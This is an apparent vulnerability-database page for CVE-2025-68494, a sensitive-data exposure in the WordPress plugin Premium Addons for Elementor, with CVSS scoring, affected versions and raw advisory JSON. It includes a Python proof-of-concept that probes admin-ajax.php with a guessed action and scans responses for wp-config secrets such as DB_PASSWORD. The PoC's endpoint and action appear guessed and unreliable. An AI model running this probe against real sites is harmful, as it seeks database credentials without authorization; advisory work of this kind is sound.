Security Vulnerability Report
中文
CVE-2025-68494 CVSS 5.3 MEDIUM

CVE-2025-68494

Published: 2025-12-24 13:16:20
Last Modified: 2026-04-27 19:16:25

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Retrieve Embedded Sensitive Data.This issue affects Premium Addons for Elementor: from n/a through <= 4.11.53.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:* - VULNERABLE
Premium Addons for Elementor <= 4.11.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-68494 PoC - Premium Addons for Elementor Information Disclosure This PoC demonstrates how an unauthenticated attacker can retrieve sensitive system information. """ import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-68494 """ # Common vulnerable endpoints in Premium Addons for Elementor vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } print(f"[*] Testing target: {target_url}") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: if 'admin-ajax.php' in endpoint: # Try common vulnerable actions data = {'action': 'pa_get_config_data'} resp = requests.post(url, data=data, headers=headers, timeout=10) else: resp = requests.get(url, headers=headers, timeout=10) if resp.status_code == 200: # Check for sensitive information patterns sensitive_patterns = [ 'DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'SECRET_KEY', 'AUTH_KEY', 'NONCE_KEY', 'table_prefix', 'wp-config.php' ] content = resp.text for pattern in sensitive_patterns: if pattern in content: print(f"[!] VULNERABLE: Found sensitive pattern '{pattern}' at {url}") print(f"[+] Response snippet: {content[:500]}...") return True print(f"[-] Endpoint {endpoint} returned status {resp.status_code}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[*] Target does not appear to be vulnerable or no sensitive data exposed") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68494", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:19.927", "lastModified": "2026-04-27T19:16:25.363", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Retrieve Embedded Sensitive Data.This issue affects Premium Addons for Elementor: from n/a through <= 4.11.53."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.11.54", "matchCriteriaId": "64CFC13B-0B7D-4AAA-946C-74E74ED44158"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/premium-addons-for-elementor/vulnerability/wordpress-premium-addons-for-elementor-plugin-4-11-53-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}